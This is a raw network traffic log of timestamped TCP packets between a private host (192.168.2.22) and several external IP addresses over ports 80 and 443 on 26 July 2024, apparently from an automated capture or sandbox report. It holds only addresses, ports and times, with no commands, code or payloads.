Jul 26, 2024 13:02:42.395476103 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.395524979 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.400026083 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.400162935 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.400333881 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.400381088 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.400791883 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.400801897 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.400844097 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.401228905 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.401240110 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.401277065 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.401824951 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.401835918 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.401875973 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.402523041 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.402534008 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.402575016 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.403220892 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.403232098 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.403273106 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.403887033 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.403898954 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.403944969 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.404557943 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.404922009 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.404933929 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.404978991 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.405591965 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.405632019 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.405967951 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.405978918 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.406028032 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.406625986 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.406670094 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.406984091 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.407396078 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.407433987 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.407675982 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.407718897 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.413366079 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.413546085 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.413554907 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.413582087 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.413592100 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.414236069 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.414588928 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.414598942 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.414634943 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.414634943 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.415271997 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.415282011 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.415323019 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.415957928 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.415968895 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.415996075 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.416002989 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.416654110 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.416663885 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.416709900 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.417313099 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.417324066 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.417334080 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.417356014 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.417362928 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.418003082 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.418013096 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.418060064 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.418689013 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.418699980 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.418730974 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.418737888 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.419377089 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.419388056 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.419435024 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.420069933 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.420080900 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.420092106 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.420114040 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.420767069 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.420778036 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.420785904 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.420815945 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.420815945 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.421391964 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.421402931 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.421448946 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.421955109 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.421964884 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.422008991 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.422529936 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.422576904 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:43.247224092 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:45.647564888 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:45.652693987 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:45.652769089 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:45.691478014 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:45.697448015 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:45.709342957 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:45.714303017 CEST	80	49168	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:45.810204029 CEST	80	49168	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:45.848994970 CEST	49178	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:45.849082947 CEST	443	49178	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:45.849148035 CEST	49178	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:45.850132942 CEST	49178	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:45.850167990 CEST	443	49178	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:46.058573008 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:46.058593035 CEST	80	49168	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:46.058650970 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:46.125204086 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.125327110 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.125338078 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.125391006 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.125680923 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.125693083 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.125730991 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.126401901 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.126415014 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.126451969 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.127311945 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.127325058 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.127356052 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.127713919 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.130279064 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.130312920 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.130428076 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.130439997 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.130481958 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.223174095 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.223195076 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.223207951 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.223253965 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.223782063 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.223794937 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.223850012 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.224376917 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.224390030 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.224422932 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.225080013 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.225091934 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.225125074 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.225878000 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.225893021 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.225933075 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.226444006 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.226458073 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.226468086 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.226494074 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.228202105 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.228218079 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.228252888 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.228728056 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.228743076 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.228753090 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.228770971 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.229636908 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.229651928 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.229660988 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.229674101 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.229681015 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.229707956 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.230817080 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.353382111 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.353424072 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.353436947 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.353441954 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.353471041 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.354053020 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.354067087 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.354113102 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.354760885 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.354773998 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.354813099 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.355521917 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.355535030 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.355575085 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.356190920 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.356208086 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.356261015 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.356937885 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.356951952 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.356961966 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.356988907 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.357645988 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.357700109 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.357743025 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.358369112 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.358387947 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.358438969 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.359095097 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.359107971 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.359160900 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.359883070 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.359894991 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.359931946 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.360405922 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.360418081 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.360428095 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.360440016 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.360455990 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.360479116 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.361372948 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.361385107 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.361396074 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.361430883 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.362495899 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.362508059 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.362519979 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.362544060 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.362564087 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.362937927 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.362951040 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.362987041 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.369762897 CEST	443	49178	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:46.369842052 CEST	49178	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:46.378676891 CEST	49178	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:46.378704071 CEST	443	49178	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:46.379013062 CEST	443	49178	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:46.379734993 CEST	49178	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:46.424495935 CEST	443	49178	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:46.439032078 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.439081907 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.439121008 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.439177036 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.439378023 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.439413071 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.439450026 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.439502954 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.440371037 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.440404892 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.440439939 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.440493107 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.441210032 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.441247940 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.441538095 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.441795111 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.441828966 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.441862106 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.441878080 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.442703962 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.442739010 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.442773104 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.442790031 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.443681955 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.443720102 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.443737984 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.443753958 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.443789959 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.443834066 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.444673061 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.444710016 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.444745064 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.444758892 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.445650101 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.445687056 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.445702076 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.445724010 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.445766926 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.446639061 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.446675062 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.446708918 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.446723938 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.446747065 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.446794987 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.447422028 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.447458029 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.447491884 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.447504997 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.448193073 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.448227882 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.448242903 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.448262930 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.448307991 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.448990107 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.449024916 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.449059010 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.449093103 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.449105978 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.449734926 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.449770927 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.449784994 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.524538994 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.524616957 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.524658918 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.524694920 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.524743080 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.525238991 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.525271893 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.525305986 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.525325060 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.526237011 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.526271105 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.526293993 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.526303053 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.526336908 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.526354074 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.527050018 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.527085066 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.527117968 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.527158022 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.527195930 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.527925014 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.527959108 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.527991056 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.528012991 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.528024912 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.528259039 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.528858900 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.528898001 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.528932095 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.528954029 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.529736996 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.529771090 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.529799938 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.529824018 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.529875994 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.530635118 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.530667067 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.530698061 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.530730963 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.530749083 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.531563044 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.531594992 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.531627893 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.531667948 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.532375097 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.532407999 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.532438993 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.532458067 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.532510996 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.532819033 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.533260107 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.533292055 CEST	80	49177	198.46.176.133	192.168.2.22
